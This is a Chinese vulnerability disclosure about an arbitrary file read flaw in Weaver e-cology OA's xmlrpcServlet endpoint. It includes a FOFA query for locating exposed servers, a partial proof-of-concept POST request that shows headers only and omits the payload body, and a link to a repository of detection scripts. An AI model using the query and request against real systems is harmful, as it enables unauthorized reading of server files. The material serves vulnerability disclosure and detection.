泛微OA xmlrpcServlet接口任意文件读取漏洞
2023-12-24 16:15:12 Author: 网络安全透视镜(查看原文) 阅读量:31 收藏

泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。

该系统 xmlrpcServlet接口存在任意文件读取漏洞,攻击者通过此漏洞,可读取服务器上任意文件。

fofa查询

app="泛微-OA(e-cology)"

POC

POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: testBanCookie=test; JSESSIONID=abcWZlxfDe-0l8aKD0AYyDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 200

然后将返回内容进行base64解码,即可获取读取内容

nuclei 漏洞检测

pocsuite3 漏洞检测

漏洞检测脚本已上传免费漏洞库

地址:

https://github.com/Vme18000yuan/FreePOC



文章来源: http://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247498806&idx=1&sn=743ca27ac748d533a848c701ffe51e86&chksm=96f13a369d4dec1fe613bd00714925922266b15f77e03b3f68e96b2a264b5f90f78d6404e3ae&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh